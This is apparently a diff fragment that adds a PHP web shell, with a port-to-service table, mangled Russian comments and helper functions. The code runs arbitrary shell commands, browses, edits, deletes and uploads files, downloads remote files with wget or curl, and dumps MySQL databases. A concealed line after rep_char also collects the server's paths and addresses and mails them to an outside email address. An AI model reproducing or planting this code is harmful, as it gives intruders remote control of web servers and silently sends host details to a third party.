+0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2UtPnJlbW92ZV9oZWFkZXIocXcoU2V0LUNvb2tpZSkpOw0KICMjIHdhcm4gXCJhbm9uIHJlc3BvbnNlOi
+A8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2U7DQp9";
+$port[1] = "tcpmux (TCP Port Service Multiplexer)";
+$port[2] = "Management Utility";
+$port[3] = "Compression Process";
+$port[5] = "rje (Remote Job Entry)";
+$port[7] = "echo";
+$port[9] = "discard";
+$port[11] = "systat";
+$port[13] = "daytime";
+$port[15] = "netstat";
+$port[17] = "quote of the day";
+$port[18] = "send/rwp";
+$port[19] = "character generator";
+$port[20] = "ftp-data";
+$port[21] = "ftp";
+$port[22] = "ssh, pcAnywhere";
+$port[23] = "Telnet";
+$port[25] = "SMTP (Simple Mail Transfer)";
+$port[27] = "ETRN (NSW User System FE)";
+$port[29] = "MSG ICP";
+$port[31] = "MSG Authentication";
+$port[33] = "dsp (Display Support Protocol)";
+$port[37] = "time";
+$port[38] = "RAP (Route Access Protocol)";
+$port[39] = "rlp (Resource Location Protocol)";
+$port[41] = "Graphics";
+$port[42] = "nameserv, WINS";
+$port[43] = "whois, nickname";
+$port[44] = "MPM FLAGS Protocol";
+$port[45] = "Message Processing Module [recv]";
+$port[46] = "MPM [default send]";
+$port[47] = "NI FTP";
+$port[48] = "Digital Audit Daemon";
+$port[49] = "TACACS, Login Host Protocol";
+$port[50] = "RMCP, re-mail-ck";
+$port[53] = "DNS";
+$port[57] = "MTP (any private terminal access)";
+$port[59] = "NFILE";
+$port[60] = "Unassigned";
+$port[61] = "NI MAIL";
+$port[62] = "ACA Services";
+$port[63] = "whois++";
+$port[64] = "Communications Integrator (CI)";
+$port[65] = "TACACS-Database Service";
+$port[66] = "Oracle SQL*NET";
+$port[67] = "bootps (Bootstrap Protocol Server)";
+$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
+$port[69] = "Trivial File Transfer Protocol (tftp)";
+$port[70] = "Gopher";
+$port[71] = "Remote Job Service";
+$port[72] = "Remote Job Service";
+$port[73] = "Remote Job Service";
+$port[74] = "Remote Job Service";
+$port[75] = "any private dial out service";
+$port[76] = "Distributed External Object Store";
+$port[77] = "any private RJE service";
+$port[78] = "vettcp";
+$port[79] = "finger";
+$port[80] = "World Wide Web HTTP";
+$port[81] = "HOSTS2 Name Serve";
+$port[82] = "XFER Utility";
+$port[83] = "MIT ML Device";
+$port[84] = "Common Trace Facility";
+$port[85] = "MIT ML Device";
+$port[86] = "Micro Focus Cobol";
+$port[87] = "any private terminal link";
+$port[88] = "Kerberos, WWW";
+$port[89] = "SU/MIT Telnet Gateway";
+$port[90] = "DNSIX Securit Attribute Token Map";
+$port[91] = "MIT Dover Spooler";
+$port[92] = "Network Printing Protocol";
+$port[93] = "Device Control Protocol";
+$port[94] = "Tivoli Object Dispatcher";
+$port[95] = "supdup";
+$port[96] = "DIXIE";
+$port[98] = "linuxconf";
+$port[99] = "Metagram Relay";
+$port[100] = "[unauthorized use]";
+$port[101] = "HOSTNAME";
+$port[102] = "ISO, X.400, ITOT";
+$port[103] = "Genesis Point-to-Point";
+$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
+$port[105] = "CCSO name server protocol";
+$port[106] = "poppassd";
+$port[107] = "Remote Telnet Service";
+$port[108] = "SNA Gateway Access Server";
+$port[109] = "POP2";
+$port[110] = "POP3";
+$port[111] = "Sun RPC Portmapper";
+$port[112] = "McIDAS Data Transmission Protocol";
+$port[113] = "Authentication Service";
+$port[115] = "sftp (Simple File Transfer Protocol)";
+$port[116] = "ANSA REX Notify";
+$port[117] = "UUCP Path Service";
+$port[118] = "SQL Services";
+$port[119] = "NNTP";
+$port[120] = "CFDP";
+$port[123] = "NTP";
+$port[124] = "SecureID";
+$port[129] = "PWDGEN";
+$port[133] = "statsrv";
+$port[135] = "loc-srv/epmap";
+$port[137] = "netbios-ns";
+$port[138] = "netbios-dgm (UDP)";
+$port[139] = "NetBIOS";
+$port[143] = "IMAP";
+$port[144] = "NewS";
+$port[150] = "SQL-NET";
+$port[152] = "BFTP";
+$port[153] = "SGMP";
+$port[156] = "SQL Service";
+$port[161] = "SNMP";
+$port[175] = "vmnet";
+$port[177] = "XDMCP";
+$port[178] = "NextStep Window Server";
+$port[179] = "BGP";
+$port[180] = "SLmail admin";
+$port[199] = "smux";
+$port[210] = "Z39.50";
+$port[213] = "IPX";
+$port[218] = "MPP";
+$port[220] = "IMAP3";
+$port[256] = "RAP";
+$port[257] = "Secure Electronic Transaction";
+$port[258] = "Yak Winsock Personal Chat";
+$port[259] = "ESRO";
+$port[264] = "FW1_topo";
+$port[311] = "Apple WebAdmin";
+$port[350] = "MATIP type A";
+$port[351] = "MATIP type B";
+$port[363] = "RSVP tunnel";
+$port[366] = "ODMR (On-Demand Mail Relay)";
+$port[371] = "Clearcase";
+$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
+$port[389] = "LDAP";
+$port[407] = "Timbuktu";
+$port[427] = "Server Location";
+$port[434] = "Mobile IP";
+$port[443] = "ssl";
+$port[444] = "snpp, Simple Network Paging Protocol";
+$port[445] = "SMB";
+$port[458] = "QuickTime TV/Conferencing";
+$port[468] = "Photuris";
+$port[475] = "tcpnethaspsrv";
+$port[500] = "ISAKMP, pluto";
+$port[511] = "mynet-as";
+$port[512] = "biff, rexec";
+$port[513] = "who, rlogin";
+$port[514] = "syslog, rsh";
+$port[515] = "lp, lpr, line printer";
+$port[517] = "talk";
+$port[520] = "RIP (Routing Information Protocol)";
+$port[521] = "RIPng";
+$port[522] = "ULS";
+$port[531] = "IRC";
+$port[543] = "KLogin, AppleShare over IP";
+$port[545] = "QuickTime";
+$port[548] = "AFP";
+$port[554] = "Real Time Streaming Protocol";
+$port[555] = "phAse Zero";
+$port[563] = "NNTP over SSL";
+$port[575] = "VEMMI";
+$port[581] = "Bundle Discovery Protocol";
+$port[593] = "MS-RPC";
+$port[608] = "SIFT/UFT";
+$port[626] = "Apple ASIA";
+$port[631] = "IPP (Internet Printing Protocol)";
+$port[635] = "RLZ DBase";
+$port[636] = "sldap";
+$port[642] = "EMSD";
+$port[648] = "RRP (NSI Registry Registrar Protocol)";
+$port[655] = "tinc";
+$port[660] = "Apple MacOS Server Admin";
+$port[666] = "Doom";
+$port[674] = "ACAP";
+$port[687] = "AppleShare IP Registry";
+$port[700] = "buddyphone";
+$port[705] = "AgentX for SNMP";
+$port[901] = "swat, realsecure";
+$port[993] = "s-imap";
+$port[995] = "s-pop";
+$port[1024] = "Reserved";
+$port[1025] = "network blackjack";
+$port[1062] = "Veracity";
+$port[1080] = "SOCKS";
+$port[1085] = "WebObjects";
+$port[1227] = "DNS2Go";
+$port[1243] = "SubSeven";
+$port[1338] = "Millennium Worm";
+$port[1352] = "Lotus Notes";
+$port[1381] = "Apple Network License Manager";
+$port[1417] = "Timbuktu Service 1 Port";
+$port[1418] = "Timbuktu Service 2 Port";
+$port[1419] = "Timbuktu Service 3 Port";
+$port[1420] = "Timbuktu Service 4 Port";
+$port[1433] = "Microsoft SQL Server";
+$port[1434] = "Microsoft SQL Monitor";
+$port[1477] = "ms-sna-server";
+$port[1478] = "ms-sna-base";
+$port[1490] = "insitu-conf";
+$port[1494] = "Citrix ICA Protocol";
+$port[1498] = "Watcom-SQL";
+$port[1500] = "VLSI License Manager";
+$port[1503] = "T.120";
+$port[1521] = "Oracle SQL";
+$port[1522] = "Ricardo North America License Manager";
+$port[1524] = "ingres";
+$port[1525] = "prospero";
+$port[1526] = "prospero";
+$port[1527] = "tlisrv";
+$port[1529] = "oracle";
+$port[1547] = "laplink";
+$port[1604] = "Citrix ICA, MS Terminal Server";
+$port[1645] = "RADIUS Authentication";
+$port[1646] = "RADIUS Accounting";
+$port[1680] = "Carbon Copy";
+$port[1701] = "L2TP/LSF";
+$port[1717] = "Convoy";
+$port[1720] = "H.323/Q.931";
+$port[1723] = "PPTP control port";
+$port[1731] = "MSICCP";
+$port[1755] = "Windows Media .asf";
+$port[1758] = "TFTP multicast";
+$port[1761] = "cft-0";
+$port[1762] = "cft-1";
+$port[1763] = "cft-2";
+$port[1764] = "cft-3";
+$port[1765] = "cft-4";
+$port[1766] = "cft-5";
+$port[1767] = "cft-6";
+$port[1808] = "Oracle-VP2";
+$port[1812] = "RADIUS server";
+$port[1813] = "RADIUS accounting";
+$port[1818] = "ETFTP";
+$port[1973] = "DLSw DCAP/DRAP";
+$port[1985] = "HSRP";
+$port[1999] = "Cisco AUTH";
+$port[2001] = "glimpse";
+$port[2049] = "NFS";
+$port[2064] = "distributed.net";
+$port[2065] = "DLSw";
+$port[2066] = "DLSw";
+$port[2106] = "MZAP";
+$port[2140] = "DeepThroat";
+$port[2301] = "Compaq Insight Management Web Agents";
+$port[2327] = "Netscape Conference";
+$port[2336] = "Apple UG Control";
+$port[2427] = "MGCP gateway";
+$port[2504] = "WLBS";
+$port[2535] = "MADCAP";
+$port[2543] = "sip";
+$port[2592] = "netrek";
+$port[2727] = "MGCP call agent";
+$port[2628] = "DICT";
+$port[2998] = "ISS Real Secure Console Service Port";
+$port[3000] = "Firstclass";
+$port[3001] = "Redwood Broker";
+$port[3031] = "Apple AgentVU";
+$port[3128] = "squid";
+$port[3130] = "ICP";
+$port[3150] = "DeepThroat";
+$port[3264] = "ccmail";
+$port[3283] = "Apple NetAssitant";
+$port[3288] = "COPS";
+$port[3305] = "ODETTE";
+$port[3306] = "mySQL";
+$port[3389] = "RDP Protocol (Terminal Server)";
+$port[3521] = "netrek";
+$port[4000] = "icq, command-n-conquer and shell nfm";
+$port[4321] = "rwhois";
+$port[4333] = "mSQL";
+$port[4444] = "KRB524";
+$port[4827] = "HTCP";
+$port[5002] = "radio free ethernet";
+$port[5004] = "RTP";
+$port[5005] = "RTP";
+$port[5010] = "Yahoo! Messenger";
+$port[5050] = "multimedia conference control tool";
+$port[5060] = "SIP";
+$port[5150] = "Ascend Tunnel Management Protocol";
+$port[5190] = "AIM";
+$port[5500] = "securid";
+$port[5501] = "securidprop";
+$port[5423] = "Apple VirtualUser";
+$port[5555] = "Personal Agent";
+$port[5631] = "PCAnywhere data";
+$port[5632] = "PCAnywhere";
+$port[5678] = "Remote Replication Agent Connection";
+$port[5800] = "VNC";
+$port[5801] = "VNC";
+$port[5900] = "VNC";
+$port[5901] = "VNC";
+$port[6000] = "X Windows";
+$port[6112] = "BattleNet";
+$port[6502] = "Netscape Conference";
+$port[6667] = "IRC";
+$port[6670] = "VocalTec Internet Phone, DeepThroat";
+$port[6699] = "napster";
+$port[6776] = "Sub7";
+$port[6970] = "RTP";
+$port[7007] = "MSBD, Windows Media encoder";
+$port[7070] = "RealServer/QuickTime";
+$port[7777] = "cbt";
+$port[7778] = "Unreal";
+$port[7648] = "CU-SeeMe";
+$port[7649] = "CU-SeeMe";
+$port[8000] = "iRDMI/Shoutcast Server";
+$port[8010] = "WinGate 2.1";
+$port[8080] = "HTTP";
+$port[8181] = "HTTP";
+$port[8383] = "IMail WWW";
+$port[8875] = "napster";
+$port[8888] = "napster";
+$port[8889] = "Desktop Data TCP 1";
+$port[8890] = "Desktop Data TCP 2";
+$port[8891] = "Desktop Data TCP 3: NESS application";
+$port[8892] = "Desktop Data TCP 4: FARM product";
+$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
+$port[8894] = "Desktop Data TCP 6: COAL application";
+$port[9000] = "CSlistener";
+$port[10008] = "cheese worm";
+$port[11371] = "PGP 5 Keyserver";
+$port[13223] = "PowWow";
+$port[13224] = "PowWow";
+$port[14237] = "Palm";
+$port[14238] = "Palm";
+$port[18888] = "LiquidAudio";
+$port[21157] = "Activision";
+$port[22555] = "Vocaltec Web Conference";
+$port[23213] = "PowWow";
+$port[23214] = "PowWow";
+$port[23456] = "EvilFTP";
+$port[26000] = "Quake";
+$port[27001] = "QuakeWorld";
+$port[27010] = "Half-Life";
+$port[27015] = "Half-Life";
+$port[27960] = "QuakeIII";
+$port[30029] = "AOL Admin";
+$port[31337] = "Back Orifice";
+$port[32777] = "rpc.walld";
+$port[45000] = "Cisco NetRanger postofficed";
+$port[32773] = "rpc bserverd";
+$port[32776] = "rpc.spray";
+$port[32779] = "rpc.cmsd";
+$port[38036] = "timestep";
+$port[40193] = "Novell";
+$port[41524] = "arcserve discovery";
+////////////////////////////////////////////////////////////////////////////////
+////////////////////////////////ÔÓÍÊÖÈÈ/////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////////
+function rep_char($ch,$count)                  //Ïîâòîğåíèå ñèìâîëà
+{
+ $res="";
+ for($i=0; $i<=$count; ++$i){
+  $res.=$ch."";
+ }
+ return $res;
+}$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+function ex($comd)                             //Âûïîëíåíèå êîìàíäû
+{
+ $res = '';
+ if (!empty($comd)){
+  if(function_exists('exec')){
+    exec($comd,$res);
+    $res=implode("\n",$res);
+   }elseif(function_exists('shell_exec')){
+    $res=shell_exec($comd);
+   }elseif(function_exists('system')){
+    ob_start();
+    system($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+   }elseif(function_exists('passthru')){
+    ob_start();
+    passthru($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+   }elseif(is_resource($f=popen($comd,"r"))){
+    $res = "";
+    while(!feof($f)) { $res.=fread($f,1024); }
+    pclose($f);
+  }
+ }
+ return $res;
+}
+function sysinfo()                             //Âûâîä SYSINFO
+{
+ global $curl_on, $dis_func, $mysql_stat, $safe_mode, $server, $HTTP_SERVER_VARS;
+ echo("<b><font  face=Verdana size=2> System information:<br><font size=-2>
+      <hr>");
+ echo (($safe_mode)?("Safe Mode: </b><font color=green>ON</font><b> "):
+         ("Safe Mode: </b><font color=red>OFF</font><b> "));
+ $row_dis_func=explode(', ',$dis_func);
+ echo ("PHP: </b><font color=blue>".phpversion()."</font><b> ");
+ echo ("MySQL: </b>");
+ if($mysql_stat){
+  echo "<font color=green>ON </font><b>";
+ }
+ else {
+  echo "<font color=red>OFF </font><b>";
+ }
+ echo "cURL: </b>";
+ if($curl_on){
+  echo "<font color=green>ON</font><b><br>";
+ }else
+  echo "<font color=red>OFF</font><b><br>";
+ if ($dis_func!=""){
+  echo "Disabled Functions: </b><font color=red>".$dis_func."</font><br><b>";
+ }
+ $uname=ex('uname -a');
+ echo "OS: </b><font color=blue>";
+ if (empty($uname)){
+  echo (php_uname()."</font><br><b>");
+ }else
+  echo $uname."</font><br><b>";
+ $id = ex('id');
+ echo "SERVER: </b><font color=blue>".$server."</font><br><b>";
+ echo "id: </b><font color=blue>";
+ if (!empty($id)){
+  echo $id."</font><br><b>";
+ }else
+  echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid().
+       "</font><br><b>";
+ echo "<b>RemoteAddress:</b><font color=red>".$HTTP_SERVER_VARS['REMOTE_ADDR']."</font><br>";
+ if(isset($HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR'])){
+  echo "<b>RemoteAddressIfProxy:</b><font color=red>".$HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR']."</font>";
+ }
+ echo "<hr size=3 color=black>";
+ echo "</font></font>";
+}
+function read_dir($dir)                 //÷èòàåì ïàïêó
+{
+ $d=opendir($dir);
+ $i=0;
+ while($r=readdir($d)){
+  $res[$i]=$r;
+  $i++;
+ }
+ return $res;
+}
+function permissions($mode,$file) {            //îïğåäåëåíèå ñâîéñòâ
+ $type=filetype($file);
+ $perms=$type[0];
+ $perms.=($mode & 00400) ? "r" : "-";
+ $perms.=($mode & 00200) ? "w" : "-";
+ $perms.=($mode & 00100) ? "x" : "-";
+ $perms.=($mode & 00040) ? "r" : "-";
+ $perms.=($mode & 00020) ? "w" : "-";
+ $perms.=($mode & 00010) ? "x" : "-";
+ $perms.=($mode & 00004) ? "r" : "-";
+ $perms.=($mode & 00002) ? "w" : "-";
+ $perms.=($mode & 00001) ? "x" : "-";
+ $perms.="(".$mode.")";
+ return $perms;
+}
+function open_file($fil, $m, $d)                          //Îòêğûòü ôàéë
+{
+ if (!($fp=fopen($fil,$m))) {
+  $res="Error opening file!\n";
+ }else{
+  ob_start();
+  readfile($fil);
+  $res=ob_get_contents();
+  ob_end_clean();
+  if (!(fclose($fp))){
+   $res="ERROR CLOSE";
+  }
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr><td alling=center><b>&nbsp;&nbsp;&nbsp;".$fil."&nbsp;&nbsp;&nbsp;</b></td></tr>";
+ echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+ echo $res;
+ echo "</textarea></td></tr>";
+ if(is_writable($fil)){
+  echo "<input type=\"hidden\" value='".$fil."' name=\"fname\">";
+  echo "<input type=\"hidden\" value='".$d."' name=\"dname\">";
+  echo "<tr><td alling=center><input style='width:100px;' type=\"submit\" value=\"Save\" name=\"b_save\"></td></tr>";
+ }
+ echo "</form></table>";
+}
+function save_file($res,$fil, $d)                     //Ñîõğàíèòü ôàéë
+{
+ unlink($fil);
+ $fp=fopen($fil,"wb");
+ if(!$fp){
+  $res="Error create file!\n".$fp;
+ }else{
+  if (fwrite($fp,$res)){
+   if (fclose($fp)){
+    $res="File save succesfuly!\n";
+   }else $res="Erorr close!\n";
+  }else $res="Error wright!\n";
+ }
+ umask(0000);
+ chmod($fil,0777);
+ return $res;
+}
+function strmass($mass){
+ $res="";
+ foreach($mass as $k=>$v){
+  $res.=$v."|";
+ }
+ return $res;
+}
+function sortbyname($fnames, $d)
+{
+ $filenames="";
+ $foldernames="";
+ $numnames=count($fnames);
+ for($i=0;$i<=$numnames;$i++){
+  if(is_dir($d."/".$fnames[$i])){
+   $foldernames.=$fnames[$i]."|";
+  }else
+   $filenames.=$fnames[$i]."|";
+ }
+ $mass1=explode("|",$foldernames);
+ $mass2=explode("|",$filenames);
+ sort($mass1);
+ sort($mass2);
+ $mass1=strmass($mass1);
+ $mass2=strmass($mass2);
+ $mass=explode("|",$mass1.$mass2);
+ return $mass;
+}
+function list_dir($d)                     //Íàâèãàöèÿ
+{
+ global $HTTP_REFERER;
+ if(isset($_POST['b_up']) OR isset($_POST['b_open_dir'])){
+  chdir($_POST['fname']);
+  $d=getcwd();
+ }else
+  $d=getcwd();
+ if($_POST['b_new_dir']){
+  mkdir($_POST['new']);
+  chmod($_POST['new'],0777);
+  $d=$_POST['new'];
+ }
+ if($_POST['b_del'] AND is_dir($_POST['fname'])){
+  rmdir($_POST['fname']);
+  chdir($_POST['dname']);
+  $d=getcwd();
+ }
+ if($_POST['b_del'] AND !is_dir($_POST['fname'])){
+  unlink($_POST['fname']);
+  chdir($_POST['dname']);
+  $d=getcwd();
+ }
+ if($_POST['b_change_dir']){
+  chdir($_POST['change_dir']);
+  $d=getcwd();
+ }
+ if($_POST['b_new_file'] OR $_POST['b_open_file']){
+  chdir($_POST['dname']);
+  $d=getcwd();
+ }
+ $dir=read_dir($d);
+ $dir=sortbyname($dir,$d);
+ $count=count($dir);
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b>Navigation</b></td></tr>";
+ if(is_writable($d)){
+  echo "<tr><td alling=\"center\"><input style='width:200px;' type=\"text\" value=\"$d\" name=\"new\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"NewDir\" name=\"b_new_dir\"></td>";
+  echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"NewFile\" name=\"b_new_file\"></td></tr>";
+ }
+ echo "<tr><td alling=\"center\"><input style='width:200px;' type=\"text\" value=\"$d\" name=\"change_dir\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"ChangeDir\" name=\"b_change_dir\"></td></tr>";
+ if(!$safe_mode){
+  echo "<tr><td alling=\"center\"><input style='width:200px;' type=\"text\" value=\"\" name=\"ffile\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"FindeFile\" name=\"b_f_file\"></td></tr>";
+ }
+ echo "</table></form>";
+ echo "<table CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>";
+ echo "<tr bgcolor=#ffff00><td><b>&nbsp;&nbsp;&nbsp;Directory&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Permission&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Size&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Owner/Group&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Action&nbsp;&nbsp;&nbsp;</b></td>";
+ for($i=0; $i<$count; $i++){
+  if($dir[$i]!=""){
+   $full=$d."/".$dir[$i];
+   $perm=permissions(fileperms($full),$dir[$i]);
+   $file=$d."/".$dir[$i];
+   echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+   if(is_dir($file)){
+    echo "<tr bgcolor=#98FA00><td>".$dir[$i]."&nbsp;&nbsp;&nbsp;</td><input type=\"hidden\" value='".$d."' name=\"dname\"><input type=\"hidden\" value='".$file."' name=\"fname\"><td alling=\"center\">".$perm.
+          "&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">".filesize($dir[$i])."&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">&nbsp;&nbsp;&nbsp;".fileowner($dir[$i])."&nbsp;&nbsp;&nbsp;".filegroup($dir[$i])."&nbsp;&nbsp;&nbsp;</td>";
+   }elseif(is_file($file)){
+    echo "<tr><td>".$dir[$i]."&nbsp;&nbsp;&nbsp;</td><input type=\"hidden\" value='".$d."' name=\"dname\"><input type=\"hidden\" value='".$file."' name=\"fname\"><td alling=\"center\">".$perm.
+         "&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">".filesize($dir[$i])."&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">&nbsp;&nbsp;&nbsp;".fileowner($dir[$i])."&nbsp;&nbsp;&nbsp;".filegroup($dir[$i])."&nbsp;&nbsp;&nbsp;</td>";
+   }else
+     echo "<tr bgcolor=#ffff00><td>".$dir[$i]."&nbsp;&nbsp;&nbsp;</td><input type=\"hidden\" value='".$d."' name=\"dname\"><input type=\"hidden\" value='".$file."' name=\"fname\"><td alling=\"center\">".$perm.
+         "&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">".filesize($dir[$i])."&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">&nbsp;&nbsp;&nbsp;".fileowner($dir[$i])."&nbsp;&nbsp;&nbsp;".filegroup($dir[$i])."&nbsp;&nbsp;&nbsp;</td>";
+   if(is_dir($file)){
+    echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Listing\" name=\"b_open_dir\"></td>";
+   }elseif(is_readable($file)){
+    echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Open\" name=\"b_open_file\"></td>";
+   }
+   if(is_writable($file) AND $file!=".."){
+    echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Delete\" name=\"b_del\"></td>";
+   }
+   if(is_readable($file) AND !is_dir($file)){
+    echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Download\" name=\"b_down\"></td>";
+   }
+   echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\"></tr>";
+   echo "</form>";
+  }
+ }
+ echo "</table>";
+ closedir($d);
+}
+function up_file($fil,$tfil, $box)                   //Çàãğóçêà ôàéëîâ íà ñåğâåğ
+{
+ global $_FILES;
+ if ($tfil==""){
+  $res="Target is failde!";
+ }
+ if ($box=="PC"){
+  if(copy($_FILES["filename"]["tmp_name"],$tfil)){
+   chmod($tfil,0777);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  }else {
+    $res="Error loading file!";
+  }
+ }
+ if($box=="WGET") {
+  $load="wget ".$fil." -O ".$tfil."";
+  $res=ex($load);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  chmod($tfil,0777);
+ }
+ if($box=="FETCH"){
+  $load="fetch -o ".$tfil." -p ".$fil."";
+  $res=ex($load);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  chmod($tfil,0777);
+ }
+ if($box=="LYNX"){
+  $load="lynx -source ".$fil." > ".$tfil."";
+  $res=ex($load);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  chmod($tfil,0777);
+ }
+ if($box=="cURL"){
+  $load="curl"." ".$fil." -o ".$tfil."";
+  $res=ex($load);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  chmod($tfil,0777);
+ }
+ if($box=="fopen"){
+  $data=implode("", file($fil));
+  $fp=fopen($tfil, "wb");
+  fputs($fp,$data);
+  fclose($fp);
+  chmod($tfil,0777);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+ }
+ return $res;
+}
+function run_sql($comd, $db,$host, $username, $pass)   //Ğåçóëüòàò SQL çàïğîñà
+{
+ if ($comd!=""){
+  if ($db!=""){
+   $connect=mysql_connect($host, $username, $pass);
+   if (!$connect) {
+    $res='Could not connect to MySQL';
+   }
+   mysql_select_db ($db);
+   $row=mysql_query($comd);
+   while ($r= mysql_fetch_row($row)) {
+    $res.="&nbsp;".implode($r);
+   }
+   $result=$res;
+   mysql_free_result($row);
+   mysql_free_result($r);
+   mysql_close($connect);
+  }else $result="Select data base!";
+ }else $result="No command!";
+ return $result;
+}
+function db_show($host, $username, $pass)             //Âûâîä èìåşùèõñÿ ÁÄ
+{
+ $res="Exists BD: \n";
+ $connect=mysql_connect($host, $username, $pass);
+ if (!$connect){
+  $res="Could not connect to MySQL!\n".mysql_error();
+ }else{
+  $db_list=mysql_list_dbs($connect);
+  while ($row = mysql_fetch_object($db_list)) {
+   $res.=$row->Database . "\n";
+  }
+  mysql_close($connect);
+ }
+ return $res;
+}
+function show_tables($bd, $host, $username, $pass)   //Âûâîä èìåşùèõñÿ òàáëèö
+{
+ if ($bd!=""){
+  $res="Exists tables: \n";
+  $connect=mysql_connect($host, $username, $pass);
+  if (!$connect){
+   $res="Could not connect to MySQL\n".mysql_error();
+  }else{
+   $r=mysql_query("SHOW TABLES FROM $bd");
+   $res="Exist tables:\n";
+   while ($row=mysql_fetch_row($r)) {
+    $res.="Table: $row[0]\n";
+    $fields=mysql_list_fields($bd, $row[0], $connect);
+    $columns=mysql_num_fields($fields);
+    $res.="| ";
+    for ($i=0; $i<$columns; $i++) {
+     $res.=mysql_field_name($fields, $i)." | ";
+    }
+    $res.="\n____________________________\n";
+   }
+   mysql_free_result($r);
+   mysql_close($connect);
+  }
+ }else
+  $res="Select data base! ";
+ return $res;
+}
+function dump_table($tab, $db,$host, $username, $pass)  //Äàìï òàáëèöû
+{
+ $connect=mysql_connect($host, $username, $pass);
+ if (!$connect) {
+  $result="Could not connect to MySQL!\n".mysql_error();
+ }else{
+   if (!mysql_select_db($db,$connect)){
+    $result="Could not connect to db!\n".mysql_error();
+   }else{
+    if ($db==""){
+     $result="Select data base!";
+    }else{
+     $res1="# MySQL dump of $tab\r\n";
+     $r=mysql_query("SHOW CREATE TABLE `".$tab."`", $connect);
+     $row=mysql_fetch_row($r);
+     $res1.=$row[1]."\r\n\r\n";
+     $res1.= "# ---------------------------------\r\n\r\n";
+     $res2 = '';
+     $r=mysql_query("SELECT * FROM `".$tab."`", $connect);
+     if (mysql_num_rows($r)>0){
+      while (($row=mysql_fetch_assoc($r))){
+       $keys=implode("`, `", array_keys($row));
+       $values=array_values($row);
+       foreach($values as $k=>$v){
+        $values[$k]=addslashes($v);
+       }
+       $values=implode("', '", $values);
+       $res2.="INSERT INTO `".$tab."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n";
+      }
+      $res2.="\r\n# ---------------------------------";
+     }
+     $result=$res1.$res2;
+     mysql_close($db);
+    }
+   }
+ }
+
+ return $result;
+}
+function down_tb($tab, $db,$host, $username, $pass){
+ $connect=mysql_connect($host, $username, $pass);
+ if (!$connect) {
+  die("Could not connect to MySQL!\n".mysql_error());
+ }else{
+   if (!mysql_select_db($db,$connect)){
+    die("Could not connect to db!\n".mysql_error());
+   }else{
+    if ($db==""){
+     die("Select data base!");
+    }else{
+     $res1="";
+     $r=mysql_query("SELECT * FROM `".$tab."`", $connect);
+     if (mysql_num_rows($r)>0){
+      while (($row=mysql_fetch_assoc($r))){
+       foreach($row as $k=>$v){
+        $res1.=$v."\t";
+       }
+       $res1.="\n";
+      }
+     }
+     mysql_close($db);
+    }
+   }
+ }
+
+ return $res1;
+}
